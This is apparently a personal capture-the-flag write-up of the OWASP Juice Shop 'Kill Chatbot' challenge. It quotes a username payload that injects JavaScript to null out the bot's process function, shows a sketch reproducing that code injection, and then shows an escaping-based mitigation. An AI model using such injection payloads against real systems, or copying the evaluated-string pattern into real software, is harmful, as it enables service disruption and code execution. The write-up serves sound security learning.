Challenge:



Name: Kill Chatbot

Description: Permanently disable the support chatbot so that it can no longer answer customer queries.

Difficulty: 5 star

Category: Vulnerable Components

Expanded Description: https://pwning.owasp-juice.shop/part2/vulnerable-components.html

Tools used:

None.

Resources used:

Solution Guide https://pwning.owasp-juice.shop/appendix/solutions.html

Methodology:

The expanded description for this challenge strongly suggests that the vulnerability to exploit lies in the code that runs the bot. First things first: I found the package that runs the bot, “juicy-chat-bot”, in the application-configuration file.

Here I found that there’s a GitHub repository for the package, so I went there and downloaded the package.



Next, I checked the package's dependencies, thinking one of them might be a library with a known vulnerability to exploit.

Unfortunately there was no such luck. I then spent significant time poring over each file in the GitHub repository, trying to find a way to kill the bot. My lack of JavaScript experience, however, was a serious hindrance to this effort. Having written very, very little JS over the course of my education, I struggled to figure out what the intended solution for this challenge was. I saw the following piece of code and knew it had to have something to do with the solution, but had zero clue how to exploit it.

![Code from juicy-chat-bot defining the users object (idmap, addUser, get) and the train and process functions](https://curiositykillscolby.com/wp-content/uploads/2021/01/image-2.jpeg?w=573)



So I went to the Solution Guide and found this string: admin"); process=null; users.addUser("1337", "test

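Set as the username, this string injects JS code that kills the bot: the process=null part overwrites the process function that the bot uses to answer queries. Exactly how the username ends up being run as code is something I’m still trying to wrap my head around.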
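Here is a minimal sketch of why a payload like this can work. It assumes the bot builds a line of code by pasting the username between double quotes and then evaluates that line; the write-up does not show that part of the package, so treat it as an assumption. Node's built-in `vm` module is used here only as a stand-in for whatever the package really uses, and `addUser`, `askBot`, the tokens, and the reply text are hypothetical names loosely modeled on the code in the screenshot above.

```javascript
const vm = require('vm')

// Stand-in for the bot's script, loosely modeled on the screenshot (not the real package code).
const sandbox = vm.createContext({})
vm.runInContext(`
  var users = {
    idmap: {},
    addUser: function (token, name) { this.idmap[token] = name },
    get: function (token) { return this.idmap[token] }
  }
  function process (query, token) {
    if (users.get(token)) {
      return { action: 'response', body: 'Hello ' + users.get(token) }
    }
    return { action: 'unrecognized', body: 'user does not exist' }
  }
`, sandbox)

// Assumed vulnerable pattern: user-controlled values are pasted into a string of code.
function addUser (token, name) {
  vm.runInContext(`users.addUser("${token}", "${name}")`, sandbox)
}

// Hypothetical helper: ask the bot a question on behalf of the first user.
function askBot () {
  return vm.runInContext('process("hi", "token-1")', sandbox)
}

addUser('token-1', 'alice')
const before = askBot()
console.log(before.body) // Hello alice

// With the payload as the name, the evaluated line becomes three statements:
// users.addUser("token-2", "admin"); process=null; users.addUser("1337", "test")
const payload = 'admin"); process=null; users.addUser("1337", "test'
addUser('token-2', payload)

let botAlive = true
try {
  askBot()
} catch (err) {
  // process is now null, so calling it throws a TypeError
  botAlive = false
}
console.log(botAlive) // false
```

The first `");` closes the string and the call the code was building, `process=null` runs as its own statement, and the trailing `users.addUser("1337", "test` reuses the closing `")` from the template so the whole line still parses.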

Prevention and Mitigation Strategies:

OWASP Vulnerable Dependency Management Cheat Sheet

Lessons Learned and Things Worth Mentioning:

JavaScript (and any other language that can evaluate a string as code) allows user input to be interpreted as code if that input is inserted into evaluated code without being sanitized properly. This is something entirely new to me, and as I’ve never seen it before I wouldn’t have been able to work it out without the Solution Guide.
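One way to keep input from being read as code, sketched under the same assumption that a line of code is built from the username and evaluated: serialize each value with `JSON.stringify` before inserting it, so quotes and backslashes are escaped and the value stays a single string literal. `addUserSafely` and the stand-in script are hypothetical, and Node's built-in `vm` module again stands in for the real sandbox. This is not the fix the package's maintainers chose, only an illustration of the idea.

```javascript
const vm = require('vm')

// Stand-in for the bot's script, loosely modeled on the screenshot (not the real package code).
const sandbox = vm.createContext({})
vm.runInContext(`
  var users = {
    idmap: {},
    addUser: function (token, name) { this.idmap[token] = name },
    get: function (token) { return this.idmap[token] }
  }
  function process (query, token) {
    return users.get(token) ? 'Hello ' + users.get(token) : 'user does not exist'
  }
`, sandbox)

// JSON.stringify adds the surrounding quotes and escapes any quotes inside the value.
function addUserSafely (token, name) {
  vm.runInContext(
    `users.addUser(${JSON.stringify(token)}, ${JSON.stringify(name)})`,
    sandbox
  )
}

const payload = 'admin"); process=null; users.addUser("1337", "test'
addUserSafely('token-2', payload)

// The payload is stored as a plain (odd-looking) username and nothing was executed.
const storedName = vm.runInContext('users.get("token-2")', sandbox)
const processStillDefined = vm.runInContext('typeof process', sandbox) === 'function'
console.log(storedName === payload) // true
console.log(processStillDefined) // true
```

Avoiding string-built code altogether, and passing user data as data, is generally the more robust choice; escaping is shown here because it is the smallest change to the assumed pattern.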